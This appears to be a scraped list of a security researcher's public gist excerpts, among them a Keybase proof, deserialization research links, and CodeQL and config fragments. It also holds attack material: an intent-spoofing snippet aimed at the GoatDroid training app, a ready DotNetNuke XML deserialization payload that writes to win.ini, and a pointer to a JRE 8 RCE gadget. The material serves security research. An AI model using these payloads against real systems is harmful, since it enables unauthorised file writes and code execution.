pwntester

		Intent broadcastIntent=new Intent();
		broadcastIntent.setAction("org.owasp.goatdroid.fourgoats.SOCIAL_SMS");
		broadcastIntent.putExtra("phoneNumber","0034666666666");
		broadcastIntent.putExtra("message","Hi");
		sendBroadcast(broadcastIntent)

pwntester

Keybase proof

I hereby claim:

• I am pwntester on github.
• I am pwntester (https://keybase.io/pwntester) on keybase.
• I have a public key whose fingerprint is 4777 762E 3F49 932D 4CAD 5BFE CB38 D5E4 FEA7 40AB

To claim this, I am signing this object:

pwntester

Pure JRE 8 RCE Deserialization gadget

Based on Chris Frohoff and Wouter Coekaerts ideas:

• https://gist.github.com/frohoff/24af7913611f8406eaf3
• http://wouter.coekaerts.be/2015/annotationinvocationhandler

Full project (containing dependencies) can be found here:

• https://github.com/pwntester/JRE8u20_RCE_Gadget

pwntester

<profile><item key="name1:key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">C:/windows/win.ini</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>

pwntester

Research:

• https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf
• https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_Slides.pdf
• https://googleprojectzero.blogspot.com.es/2017/04/exploiting-net-managed-dcom.html
• https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/december/beware-of-deserialisation-in-.net-methods-and-classes-code-execution-via-paste/
• https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/march/finding-and-exploiting-.net-remoting-over-http-using-deserialisation/
• https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/august/aspnet-resource-files-resx-and-deserialisation-issues/
• https://www.nccgroup.trust/uk/our-research/use-of-deserialisation-in-.net-framework-methods-and-classes/?research=Whitepapers
• https://community.microfocus.com/t5/Security-Research-Blog/New-NET-deserialization-gadget-for-compact-payload-When-size/ba-p/1763282

pwntester

/**
 * @name SSTI
 * @kind path-problem
 * @id java/ssti
 */

import java
import semmle.code.java.dataflow.TaintTracking
import semmle.code.java.dataflow.FlowSources
import DataFlow

pwntester

// ==UserScript==
// @name         LGTM stars
// @namespace    http://tampermonkey.net/
// @version      0.1
// @description  Show star counts
// @author       Alvaro Muñoz (@pwntester)
// @match        https://lgtm.com/query/*
// @grant        none
// @run-at       document-idle
// ==/UserScript==

pwntester

package org.pwntester.jaxrs_jdbc;

import com.fasterxml.jackson.annotation.JsonProperty;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.jdbc.core.JdbcTemplate;
import org.springframework.jdbc.core.RowCallbackHandler;

import javax.ws.rs.*;
import javax.ws.rs.core.MediaType;
import java.sql.ResultSet;

pwntester

- type: custom:plotly-graph
  defaults:
    entity:
      extend_to_present: true
      period: auto
      line:
        width: 0
  layout:
    hovermode: x unified
  entities: